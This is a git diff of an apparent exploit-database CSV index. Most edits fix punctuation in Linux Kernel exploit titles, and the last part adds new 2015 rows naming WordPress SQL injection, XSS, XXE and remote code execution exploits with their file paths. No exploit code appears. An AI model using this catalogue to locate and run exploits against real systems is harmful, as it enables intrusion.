diff --git a/files.csv b/files.csv index 77cc5970a..a9527b365 100755 --- a/files.csv +++ b/files.csv @@ -135,7 +135,7 @@ id,file,description,date,author,platform,type,port 138,platforms/php/webapps/138.pl,"PHP-NUKE <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406 140,platforms/linux/local/140.c,"Xsok 1.02 - ""-xsokdir"" Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 -141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - ""do_mremap"" Local Proof of Concept",2004-01-06,"Christophe Devine",linux,local,0 +141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - ""do_mremap"" Local Proof of Concept (1)",2004-01-06,"Christophe Devine",linux,local,0 142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - ""do_mremap"" Local Proof of Concept (2)",2004-01-07,"Christophe Devine",linux,local,0 143,platforms/linux/remote/143.c,"lftp <= 2.6.9 - Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0 144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0 @@ -1162,7 +1162,7 @@ id,file,description,date,author,platform,type,port 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6.0 (mshtml.dll div) Denial of Service Exploit",2005-12-29,rgod,windows,dos,0 1395,platforms/php/webapps/1395.php,"phpDocumentor <= 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 1396,platforms/windows/dos/1396.cpp,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (cpp)",2005-12-29,Lympex,windows,dos,0 -1397,platforms/linux/local/1397.c,"Linux Kernel <= 2.6.11 - (CPL 0) Local Root Exploit (k-rad3.c)",2005-12-30,alert7,linux,local,0 +1397,platforms/linux/local/1397.c,"Linux Kernel <= 2.6.11 - 'k-rad3.c' (CPL 0) Local Root Exploit",2005-12-30,alert7,linux,local,0 1398,platforms/php/webapps/1398.pl,"CubeCart <= 3.0.6 - Remote Command Execution Exploit",2005-12-30,cijfer,php,webapps,0 1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0 / <= 3.06 - Login Bypass SQL Injection Exploits",2005-12-30,DevilBox,asp,webapps,0 1400,platforms/php/webapps/1400.pl,"CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit",2006-01-01,cijfer,php,webapps,0 @@ -3245,7 +3245,7 @@ id,file,description,date,author,platform,type,port 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection Exploit (2)",2007-03-27,bunker,multiple,remote,0 3585,platforms/multiple/remote/3585.pl,"Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit",2007-03-27,bunker,multiple,remote,0 3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0 -3587,platforms/linux/local/3587.c,"Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit",2007-03-27,"Robert Swiecki",linux,local,0 +3587,platforms/linux/local/3587.c,"Linux Kernel <= 2.6.20 with DCCP Support - Memory Disclosure Exploit (1)",2007-03-27,"Robert Swiecki",linux,local,0 3588,platforms/php/webapps/3588.pl,"XOOPS module Articles <= 1.02 (print.php id) SQL Injection Exploit",2007-03-27,WiLdBoY,php,webapps,0 3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow Exploit (meta)",2007-03-27,skillTube,windows,remote,80 3590,platforms/php/webapps/3590.htm,"Joomla Component D4JeZine <= 2.8 - Remote BLIND SQL Injection Exploit",2007-03-27,ajann,php,webapps,0 @@ -3253,7 +3253,7 @@ id,file,description,date,author,platform,type,port 3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 - Remote File Inclusion Exploit",2007-03-27,kezzap66345,php,webapps,0 3593,platforms/windows/local/3593.c,"Corel Wordperfect X3 13.0.0.565 - (.PRS) Local Buffer Overflow Exploit",2007-03-28,"Jonathan So",windows,local,0 3594,platforms/php/webapps/3594.pl,"XOOPS module Articles <= 1.03 (index.php cat_id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0 -3595,platforms/linux/local/3595.c,"Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit (2)",2007-03-28,"Robert Swiecki",linux,local,0 +3595,platforms/linux/local/3595.c,"Linux Kernel <= 2.6.20 with DCCP Support - Memory Disclosure Exploit (2)",2007-03-28,"Robert Swiecki",linux,local,0 3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 (header.php) Remote File Include Vulnerability",2007-03-28,GoLd_M,php,webapps,0 3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder <= 3.3 (view.php id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0 3598,platforms/php/webapps/3598.txt,"MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability",2007-03-28,kezzap66345,php,webapps,0 @@ -8062,7 +8062,7 @@ id,file,description,date,author,platform,type,port 8553,platforms/php/webapps/8553.htm,"Teraway LinkTracker 1.0 - Remote Password Change Exploit",2009-04-27,"ThE g0bL!N",php,webapps,0 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80 8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 Admin Password Disclosure Vulnerability",2009-04-27,SirGod,php,webapps,0 -8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.x SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 +8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.x - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection Vulnerabilities",2009-04-28,YEnH4ckEr,php,webapps,0 8559,platforms/php/webapps/8559.c,"webSPELL <= 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0 @@ -8835,7 +8835,7 @@ id,file,description,date,author,platform,type,port 9360,platforms/windows/local/9360.pl,"BlazeDVD 5.1/HDTV Player 6.0 - (.PLF) Universal BoF Exploit (SEH)",2009-08-04,"ThE g0bL!N",windows,local,0 9361,platforms/windows/dos/9361.pl,"RadASM 2.2.1.6 Menu Editor (.mnu) Stack Overflow PoC",2009-08-04,"Pankaj Kohli",windows,dos,0 9362,platforms/windows/dos/9362.html,"Microsoft Internet Explorer 8.0.7100.0 Simple HTML Remote Crash PoC",2009-08-05,schnuddelbuddel,windows,dos,0 -9363,platforms/linux/local/9363.c,"Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure Exploit",2009-08-05,"Jon Oberheide",linux,local,0 +9363,platforms/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - procfs Kernel Memory Disclosure Exploit",2009-08-05,"Jon Oberheide",linux,local,0 9364,platforms/windows/local/9364.py,"Tuniac 090517c - (.m3u ) Local File Crash PoC",2009-08-05,Dr_IDE,windows,local,0 9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 (afd/rfi) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 9366,platforms/windows/local/9366.pl,"jetAudio 7.1.9.4030 plus vx - (.m3u) Local Stack Overflow (SEH)",2009-08-05,corelanc0d3r,windows,local,0 @@ -12790,7 +12790,7 @@ id,file,description,date,author,platform,type,port 14589,platforms/php/webapps/14589.txt,"Php Nuke 8.x.x - BlindSQL Injection Vulnerability",2010-08-09,ITSecTeam,php,webapps,0 14592,platforms/php/webapps/14592.txt,"Joomla Yellowpages SQL Injection Vulnerability",2010-08-09,"al bayraqim",php,webapps,0 14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0 -14594,platforms/linux/dos/14594.py,"Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0 +14594,platforms/linux/dos/14594.py,"Linux Kernel <= 2.6.33.3 - SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0 14595,platforms/php/webapps/14595.html,"wizmall 6.4 - CSRF Vulnerabilities",2010-08-09,pyw1414,php,webapps,0 14596,platforms/php/webapps/14596.txt,"Joomla Component Amblog 1.0 - Multiple SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability",2010-08-10,"Oh Yaw Theng",windows,dos,0 @@ -21147,7 +21147,7 @@ id,file,description,date,author,platform,type,port 23943,platforms/linux/dos/23943.txt,"Crackalaka IRC Server 1.0.8 - Remote Denial of Service Vulnerability",2004-04-09,"Donato Ferrante",linux,dos,0 23944,platforms/windows/dos/23944.php,"Foxit Reader <= 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow",2013-01-07,rgod,windows,dos,0 23945,platforms/unix/dos/23945.txt,"Ettercap <= 0.7.5.1 - Stack Overflow Vulnerability",2013-01-07,"Sajjad Pourali",unix,dos,0 -23946,platforms/linux/dos/23946.c,"Linux Kernel 2.4/2.6 Sigqueue Blocking Denial of Service Vulnerability",2004-04-12,"Nikita V. Youshchenko",linux,dos,0 +23946,platforms/linux/dos/23946.c,"Linux Kernel 2.4/2.6 - Sigqueue Blocking Denial of Service Vulnerability",2004-04-12,"Nikita V. Youshchenko",linux,dos,0 23947,platforms/php/webapps/23947.txt,"TikiWiki Project 1.8 tiki-switch_theme.php theme Parameter XSS",2004-04-12,JeiAr,php,webapps,0 23948,platforms/php/webapps/23948.txt,"TikiWiki Project 1.8 img/wiki_up Arbitrary File Upload",2004-04-12,JeiAr,php,webapps,0 23949,platforms/php/webapps/23949.txt,"TikiWiki Project 1.8 tiki-map.phtml Traversal Arbitrary File / Directory Enumeration",2004-04-12,JeiAr,php,webapps,0 @@ -21240,7 +21240,7 @@ id,file,description,date,author,platform,type,port 24040,platforms/multiple/remote/24040.txt,"PISG 0.54 IRC Nick HTML Injection Vulnerability",2004-04-22,shr3kst3r,multiple,remote,0 24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 UMOD Manifest.INI Remote Arbitrary File Overwrite Vulnerability",2004-04-22,"Luigi Auriemma",multiple,remote,0 24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 YInsthelper.DLL Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0 -24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x/2.6.x CPUFreq Proc Handler Integer Handling Vulnerability",2004-04-23,"Brad Spengler",linux,local,0 +24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Vulnerability",2004-04-23,"Brad Spengler",linux,local,0 24044,platforms/php/webapps/24044.txt,"phpliteadmin <= 1.9.3 - Remote PHP Code Injection Vulnerability",2013-01-11,L@usch,php,webapps,0 24045,platforms/java/remote/24045.rb,"Java Applet JMX Remote Code Execution",2013-01-11,metasploit,java,remote,0 24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 Ver.asp Information Disclosure Vulnerability",2004-04-23,CyberTalon,asp,webapps,0 @@ -21272,7 +21272,7 @@ id,file,description,date,author,platform,type,port 24075,platforms/php/webapps/24075.txt,"Coppermine Photo Gallery 1.x theme.php Multiple Parameter Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0 24076,platforms/windows/remote/24076.txt,"Sambar 5.x Open Proxy and Authentication Bypass Vulnerability",2003-01-30,"David Endler",windows,remote,0 24077,platforms/windows/remote/24077.txt,"Business Objects Crystal Reports 9/10 Web Form Viewer Directory Traversal Vulnerability",2004-05-03,"Imperva Application Defense Center",windows,remote,0 -24078,platforms/linux/local/24078.c,"PaX 2.6 Kernel Patch Denial of Service Vulnerability",2004-05-03,Shadowinteger,linux,local,0 +24078,platforms/linux/local/24078.c,"PaX 2.6 Kernel Patch - Denial of Service Vulnerability",2004-05-03,Shadowinteger,linux,local,0 24079,platforms/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String Vulnerability",2004-05-03,"Nilanjan De",linux,remote,0 24080,platforms/windows/dos/24080.pl,"Titan FTP Server 3.0 LIST Denial of Service Vulnerability",2004-05-04,storm,windows,dos,0 24081,platforms/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 AddUser.CFM Administrator Command Execution Vulnerability",2004-05-05,"Stuart Jamieson",cfm,webapps,0 @@ -21855,7 +21855,7 @@ id,file,description,date,author,platform,type,port 24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include Local Buffer Overflow Vulnerability",2004-10-18,xCrZx,linux,local,0 24977,platforms/linux/remote/24977.txt,"CUPS 1.1.x - HPGL File Processor Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",linux,remote,0 24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",linux,remote,0 -24696,platforms/linux/remote/24696.c,"Linux Kernel 2.6.x IPTables Logging Rules Integer Underflow Vulnerability",2004-11-21,"Richard Hart",linux,remote,0 +24696,platforms/linux/remote/24696.c,"Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Vulnerability",2004-11-21,"Richard Hart",linux,remote,0 24697,platforms/php/webapps/24697.txt,"Serendipity 0.x Exit.PHP HTTP Response Splitting Vulnerability",2004-10-21,ChaoticEvil,php,webapps,0 24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.threads 3.4/3.5 DoSearch.PHP SQL Injection Vulnerability",2004-10-21,"Florian Rock",php,webapps,0 24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP WAV File Handler Denial of Service Vulnerability",2004-10-22,HexView,windows,dos,0 @@ -22429,10 +22429,10 @@ id,file,description,date,author,platform,type,port 25284,platforms/php/webapps/25284.txt,"Nuke Bookmarks 0.6 Marks.php SQL Injection Vulnerability",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25285,platforms/php/webapps/25285.txt,"MagicScripts E-Store Kit-2 PayPal Edition Cross-Site Scripting Vulnerability",2005-03-26,Dcrab,php,webapps,0 25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition Remote File Include Vulnerability",2005-03-26,Dcrab,php,webapps,0 -25287,platforms/linux/local/25287.c,"Linux Kernel 2.4.x/2.6.x Bluetooth Signed Buffer Index Vulnerability (1)",2005-03-28,"ilja van sprundel",linux,local,0 -25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x/2.6.x Bluetooth Signed Buffer Index Vulnerability (2)",2005-04-08,qobaiashi,linux,local,0 -25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.x/2.6.x Bluetooth Signed Buffer Index Vulnerability (3)",2005-10-19,backdoored.net,linux,local,0 -25290,platforms/linux/local/25290.c,"Linux Kernel 2.4.x/2.6.x Bluetooth Signed Buffer Index Vulnerability (4)",2005-10-24,qobaiashi,linux,local,0 +25287,platforms/linux/local/25287.c,"Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (1)",2005-03-28,"ilja van sprundel",linux,local,0 +25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (2)",2005-04-08,qobaiashi,linux,local,0 +25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (3)",2005-10-19,backdoored.net,linux,local,0 +25290,platforms/linux/local/25290.c,"Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (4)",2005-10-24,qobaiashi,linux,local,0 25291,platforms/multiple/remote/25291.txt,"Tincat Network Library Remote Buffer Overflow Vulnerability",2005-03-28,"Luigi Auriemma",multiple,remote,0 25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 Firmware - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0 25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,metasploit,linux,remote,80 @@ -22852,7 +22852,7 @@ id,file,description,date,author,platform,type,port 25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 Poll_Vote.PHP Remote File Include Vulnerability",2005-05-25,"rash ilusion",php,webapps,0 25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 Login.ASP SQL Injection Vulnerability",2005-05-25,Romty,asp,webapps,0 25706,platforms/linux/remote/25706.cpp,"GNU Mailutils 0.6 Mail Email Header Buffer Overflow Vulnerability",2004-08-10,infamous41md,linux,remote,0 -25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x Cryptoloop Information Disclosure Vulnerability",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0 +25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure Vulnerability",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0 25708,platforms/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0 25709,platforms/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 Insecure File Creation Vulnerability",2005-05-26,"Eric Romang",linux,local,0 25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plug-in Read_TCP_String Remote Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0 @@ -23397,7 +23397,7 @@ id,file,description,date,author,platform,type,port 26245,platforms/windows/local/26245.py,"Winamp 5.12 - (.m3u) Stack Based Buffer Overflow",2013-06-17,superkojiman,windows,local,0 26246,platforms/php/webapps/26246.txt,"Simple File Manager 024 - Login Bypass Vulnerability",2013-06-17,Chako,php,webapps,0 26247,platforms/php/webapps/26247.txt,"MyBulletinBoard 1.0 RateThread.PHP SQL Injection Vulnerability",2005-09-09,stranger-killer,php,webapps,0 -26248,platforms/linux/local/26248.sh,"Linux Kernel 2.6.x SCSI ProcFS Denial of Service Vulnerability",2005-09-09,anonymous,linux,local,0 +26248,platforms/linux/local/26248.sh,"Linux Kernel 2.6.x - SCSI ProcFS Denial of Service Vulnerability",2005-09-09,anonymous,linux,local,0 26249,platforms/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service Vulnerability",2005-09-09,Shiraishi.M,linux,dos,0 26250,platforms/multiple/dos/26250.pl,"COOL! Remote Control 1.12 - Remote Denial of Service Vulnerability",2005-09-12,"Infam0us Gr0up",multiple,dos,0 26251,platforms/linux/dos/26251.c,"Snort 2.x PrintTcpOptions Remote Denial of Service Vulnerability",2005-09-12,"VulnFact Security Labs",linux,dos,0 @@ -24573,7 +24573,7 @@ id,file,description,date,author,platform,type,port 27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 Img.PHP Cross-Site Scripting Vulnerability",2006-03-23,FarhadKey,php,webapps,0 27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 Img.PHP Cross-Site Scripting Vulnerability",2006-03-23,FarhadKey,php,webapps,0 27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0 -27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x.2.5.x/2.6.x Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0 +27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0 27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 ViewStatement.PHP SQL Injection Vulnerability",2003-03-23,r0t,php,webapps,0 27463,platforms/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 APWC_Win_Main.JSP Cross-Site Scripting Vulnerability",2006-03-23,anonymous,jsp,webapps,0 27464,platforms/cgi/webapps/27464.txt,"Cholod MySQL Based Message Board Mb.CGI SQL Injection Vulnerability",2006-03-24,kspecial,cgi,webapps,0 @@ -24872,10 +24872,10 @@ id,file,description,date,author,platform,type,port 27763,platforms/php/webapps/27763.php,"I-RATER Platinum Config_settings.TPL.PHP Remote File Include Vulnerability",2006-04-28,O.U.T.L.A.W,php,webapps,0 27764,platforms/linux/dos/27764.txt,"LibTiff 3.x TIFFFetchData Integer Overflow Vulnerability",2006-04-28,"Tavis Ormandy",linux,dos,0 27765,platforms/linux/dos/27765.txt,"LibTiff 3.x Double Free Memory Corruption Vulnerability",2008-04-28,"Tavis Ormandy",linux,dos,0 -27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x SMBFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0 +27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0 27767,platforms/php/webapps/27767.txt,"Artmedic Event Index.PHP Remote File Include Vulnerability",2006-04-28,botan,php,webapps,0 27768,platforms/php/webapps/27768.php,"CoolMenus 4.0 Index.PHP Remote File Include Vulnerability",2006-04-28,botan,php,webapps,0 -27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x CIFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0 +27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0 27770,platforms/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod Weblog_posting.PHP SQL Injection Vulnerability",2006-04-29,Qex,php,webapps,0 27771,platforms/php/webapps/27771.txt,"Ovidentia 7.9.4 - Multiple Vulnerabilities",2013-08-22,LiquidWorm,php,webapps,80 27855,platforms/php/webapps/27855.txt,"Vizra A_Login.PHP Cross-Site Scripting Vulnerability",2006-05-11,R00TT3R,php,webapps,0 @@ -26931,7 +26931,7 @@ id,file,description,date,author,platform,type,port 29823,platforms/php/dos/29823.c,"PHP <= 5.2.1 GD Extension WBMP File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 29824,platforms/php/webapps/29824.txt,"QuizShock <= 1.6.1 - Auth.PHP HTML Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0 29825,platforms/php/webapps/29825.txt,"UBB.Threads <= 6.1.1 UBBThreads.PHP SQL Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0 -29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x AppleTalk ATalk_Sum_SKB Function Denial of Service Vulnerability",2007-04-09,"Jean Delvare",linux,dos,0 +29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service Vulnerability",2007-04-09,"Jean Delvare",linux,dos,0 29827,platforms/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 Keyboard.PHP Local File Include Vulnerability",2007-04-09,Liz0ziM,php,webapps,0 29828,platforms/php/webapps/29828.html,"DeskPro 2.0.1 Login.PHP HTML Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0 29829,platforms/php/webapps/29829.txt,"Einfacher Passworschutz Index.PHP Cross-Site Scripting Vulnerability",2007-04-10,hackberry,php,webapps,0 @@ -30640,7 +30640,7 @@ id,file,description,date,author,platform,type,port 33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - File Include Vulnerability",2014-07-07,Vulnerability-Lab,ios,webapps,0 33999,platforms/php/webapps/33999.txt,"Mobile Chat 2.0.2 - 'chatsmileys.php' Cross-Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0 34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 BETA - 'list' Parameter Cross-Site Scripting Vulnerability",2010-01-18,indoushka,multiple,webapps,0 -34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x Btrfs Cloned File Security Bypass Vulnerability",2010-05-18,"Dan Rosenberg",linux,local,0 +34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass Vulnerability",2010-05-18,"Dan Rosenberg",linux,local,0 34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow Vulnerability",2010-05-18,"fl0 fl0w",windows,remote,0 34003,platforms/php/webapps/34003.txt,"Percha Image Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34004,platforms/php/webapps/34004.txt,"Percha Fields Attach 1.0 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 @@ -32281,7 +32281,7 @@ id,file,description,date,author,platform,type,port 35817,platforms/hardware/remote/35817.txt,"NetGear WNDAP350 Wireless Access Point Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0 35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0 35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0 -35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0 +35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0 35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0 35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0 35823,platforms/php/webapps/35823.txt,"Wordpress Pie Register Plugin 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80 @@ -32424,7 +32424,7 @@ id,file,description,date,author,platform,type,port 35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0 35955,platforms/php/webapps/35955.txt,"Easy Estate Rental 's_location' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0 35956,platforms/php/webapps/35956.txt,"Joomla Foto Component 'id_categoria' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0 -35957,platforms/linux/local/35957.txt,"Linux Kernel 2.6.26 Auerswald USB Device Driver Buffer Overflow Vulnerability",2009-10-19,"R. Dominguez Veg",linux,local,0 +35957,platforms/linux/local/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow Vulnerability",2009-10-19,"R. Dominguez Veg",linux,local,0 35958,platforms/php/webapps/35958.txt,"Joomla Juicy Gallery Component 'picId' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0 35959,platforms/php/webapps/35959.txt,"Joomla! 'com_hospital' Component SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0 35960,platforms/php/webapps/35960.txt,"Joomla Controller Component 'Itemid' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0 @@ -33489,3 +33489,18 @@ id,file,description,date,author,platform,type,port 37107,platforms/php/webapps/37107.txt,"WordPress NewStatPress Plugin 0.9.8 Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 37108,platforms/php/webapps/37108.txt,"WordPress Landing Pages Plugin 1.8.4 Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 37109,platforms/php/webapps/37109.txt,"WordPress GigPress Plugin 2.3.8 - SQL Injection",2015-05-26,"Adrián M. F.",php,webapps,80 +37110,platforms/java/webapps/37110.py,"Apache Jackrabbit WebDAV XXE Exploit",2015-05-26,"Mikhail Egorov",java,webapps,8080 +37111,platforms/php/webapps/37111.txt,"Wordpress MailChimp Subscribe Forms 1.1 Remote Code Execution",2015-05-26,woodspeed,php,webapps,80 +37112,platforms/php/webapps/37112.txt,"Wordpress church_admin Plugin 0.800 Stored XSS",2015-05-26,woodspeed,php,webapps,80 +37113,platforms/php/webapps/37113.txt,"Wordpess Simple Photo Gallery 1.7.8 Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80 +37114,platforms/jsp/webapps/37114.txt,"Sendio ESP Information Disclosure Vulnerability",2015-05-26,"Core Security",jsp,webapps,80 +37115,platforms/perl/webapps/37115.txt,"Clickheat 1.13+ Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0 +37116,platforms/php/webapps/37116.py,"SilverStripe 2.4.7 install.php PHP Code Injection Vulnerability",2012-04-27,"Mehmet Ince",php,webapps,0 +37117,platforms/perl/webapps/37117.txt,"Croogo CMS 1.3.4 Multiple HTML Injection Vulnerabilities",2012-04-29,"Chokri Ben 